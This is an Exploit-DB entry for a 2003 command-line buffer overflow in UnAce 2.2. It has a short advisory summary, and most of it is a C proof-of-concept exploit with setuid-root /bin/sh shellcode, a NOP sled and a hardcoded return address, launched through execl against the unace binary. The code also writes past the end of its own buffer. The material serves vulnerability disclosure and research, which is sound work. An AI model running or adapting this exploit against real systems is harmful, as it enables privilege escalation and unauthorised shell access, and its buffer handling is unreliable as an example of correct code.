Winace UnAce 2.2 - Command Line Argument Buffer Overflow (1)

EDB-ID:

23368

CVE:

N/A

EDB Verified:

Author:

demz

Type:

remote

Exploit:   /  

Platform:

Linux

Date:

2003-11-10

Vulnerable App: 
// source: https://www.securityfocus.com/bid/9002/info

UnAce has been reported to be prone to a buffer overflow vulnerability. The issue presents itself when UnAce handles ace filenames that are of excessive length. When this filename is passed to the UnAce utility as an argument, the string is copied into a reserved buffer in memory. Data that exceeds the size of the reserved buffer will overflow its bounds and will trample any saved data that is adjacent to the affected buffer. Ultimately this may lead to the execution of arbitrary instructions in the context of the user who is running UnAce.

/* gEEk-unace.c
 *
 * PoC exploit made for advisory based uppon an local stack based overflow.
 * Vulnerable versions, maybe also prior versions:
 *
 * Unace v2.2
 *
 * Tested on:  Debian 3.0
 *
 * Advisory source: MegaHz
 * http://www.securityfocus.com/archive/1/344065/2003-11-07/2003-11-13/0
 *
 * -----------------------------------------
 * coded by: demz (geekz.nl) (demz@geekz.nl)
 * -----------------------------------------
 *
 */

#include <stdio.h>
#include <stdlib.h>

char shellcode[]=

        "\x31\xc0"                      // xor          eax, eax
        "\x31\xdb"                      // xor          ebx, ebx
        "\x31\xc9"                      // xor          ecx, ecx
        "\xb0\x46"                      // mov          al, 70
        "\xcd\x80"                      // int          0x80

        "\x31\xc0"                      // xor          eax, eax
        "\x50"                          // push         eax
        "\x68\x6e\x2f\x73\x68"          // push  long   0x68732f6e
        "\x68\x2f\x2f\x62\x69"          // push  long   0x69622f2f
        "\x89\xe3"                      // mov          ebx, esp
        "\x50"                          // push         eax
        "\x53"                          // push         ebx
        "\x89\xe1"                      // mov          ecx, esp
        "\x99"                          // cdq
        "\xb0\x0b"                      // mov          al, 11
        "\xcd\x80"                      // int          0x80

        "\x31\xc0"                      // xor          eax, eax
        "\xb0\x01"                      // mov          al, 1
        "\xcd\x80";                     // int          0x80

int main()
{
        unsigned long ret = 0xbfffc260;

        char buffer[707];
        int i=0;

        memset(buffer, 0x90, sizeof(buffer));

        for (0; i < strlen(shellcode) - 1;i++)
        buffer[300 + i] = shellcode[i];

        buffer[707] = (ret & 0x000000ff);
        buffer[708] = (ret & 0x0000ff00) >> 8;
        buffer[709] = (ret & 0x00ff0000) >> 16;
        buffer[710] = (ret & 0xff000000) >> 24;
        buffer[711] = 0x0;

        printf("\nUnace v2.2 local exploit\n");
        printf("---------------------------------------- demz @ geekz.nl --\n");

        execl("./unace", "unace", "e", buffer, NULL);
}
Tags:
Advisory/Source: Link
Databases Links Sites Solutions
Exploits Search Exploit-DB OffSec Courses and Certifications
Google Hacking Submit Entry Kali Linux Learn Subscriptions
Papers SearchSploit Manual VulnHub OffSec Cyber Range
Shellcodes Exploit Statistics Proving Grounds
Penetration Testing Services
Exploits Google Hacking Papers Shellcodes
Search Exploit-DB Submit Entry SearchSploit Manual Exploit Statistics
OffSec Kali Linux VulnHub
Courses and Certifications Learn Subscriptions OffSec Cyber Range Proving Grounds Penetration Testing Services